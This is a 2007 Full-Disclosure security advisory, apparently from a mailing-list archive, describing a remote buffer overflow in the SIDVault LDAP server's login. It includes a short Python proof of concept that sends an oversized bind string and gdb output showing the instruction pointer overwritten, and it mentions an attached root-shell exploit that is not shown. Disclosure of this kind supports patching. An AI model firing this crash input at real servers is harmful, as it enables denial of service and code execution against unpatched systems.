lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 26 Aug 2007 02:50:11 +0200
From: Joxean Koret <>
To: Full Disclosure <>,
	Security Tracker <>,
Subject: SIDVault LDAP Server Remote Buffer Overflow

SIDVault LDAP Server Remote Buffer Overflow

Product Description:

SIDVault LDAP Server for Win32 and GNU/Linux

SIDVault is a Simple Integration Database, allowing easy management and
installations with high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify existing schemas, integrated web
based user access, and fast browser based administration tools. Supports
all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS. 

Vulnerable versions:

	Win32 2.0e
	Linux 2.0d

Vulnerability Details:

The login mechanism is prone to multiple buffer-overflow vulnerabilities
because it fails to adequately bounds-check user-supplied input before
copying it to an insufficiently sized buffer.

Successfully exploiting the issue will allow an attacker to execute
arbitrary code with root or SYSTEM-level privileges depending on the
operative system target. Failed exploit attempts will result in a
denial-of-service condition. 

Proof of concept:

# gdb /usr/local/sidvault/sidvault
(gdb) r -run

In another terminal:

$ cat
import ldap

l ="localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256)
$ ./

In the first terminal:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
(gdb) where
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
(gdb) i r
eax            0x8202c48        136326216
ecx            0x0      0
edx            0xb6e164df       -1226742561
ebx            0x41414141       1094795585
esp            0xb6e16500       0xb6e16500
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141


An exploit for Debian based distributions which spawns a remote root
terminal has been writen. See the attached exploit.

Patch information:

The problem is solved in the latest version (2.0f) which is available in
the vendor's website at


Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind
and professional.


The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind. 

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.


Joxean Koret - joxeankoret[at]yahoo[dot]es

View attachment "" of type "text/x-python" (1723 bytes)

Download attachment "signature.asc" of type "application/pgp-signature" (192 bytes)

Powered by blists - more mailing lists